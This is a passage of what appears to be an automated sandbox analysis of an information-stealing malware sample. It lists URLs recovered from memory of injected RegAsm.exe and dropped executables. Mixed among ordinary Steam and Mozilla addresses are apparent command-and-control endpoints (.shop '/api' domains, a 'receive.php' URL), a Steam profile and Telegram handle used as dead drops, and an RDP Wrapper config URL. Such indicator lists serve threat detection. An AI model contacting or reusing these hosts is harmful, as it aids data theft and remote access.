Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: RegAsm.exe, 00000006.00000002.2061826674.000000000125F000.00000004.00000020.00020000.00000000.sdmp, AEHIDA.6.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawzhotdog.shop/api
Source: EHJDGC.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EHJDGC.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EHJDGC.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/v
Source: CFHIIEHJKK.exe, 00000014.00000002.2475522299.0000000003040000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp, CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000035EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receiL
Source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.php
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: AEHIDA.6.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.c
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RDPWInst.exe, 0000001E.00000002.2111451674.0000000000401000.00000020.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/api
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/os%P
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 00000010.00000002.2096077278.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/4G
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/V
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/lG
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2061826674.00000000011C1000.00000004.00000020.00020000.00000000.sdmp, BKKFCFBKFC.exe, 00000011.00000002.1990889383.000000000431B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000437000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869&nX
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997804188691
Source: file.exe, 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, BKKFCFBKFC.exe, 00000011.00000002.1990889383.000000000431B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000437000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000010.00000002.2095280392.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
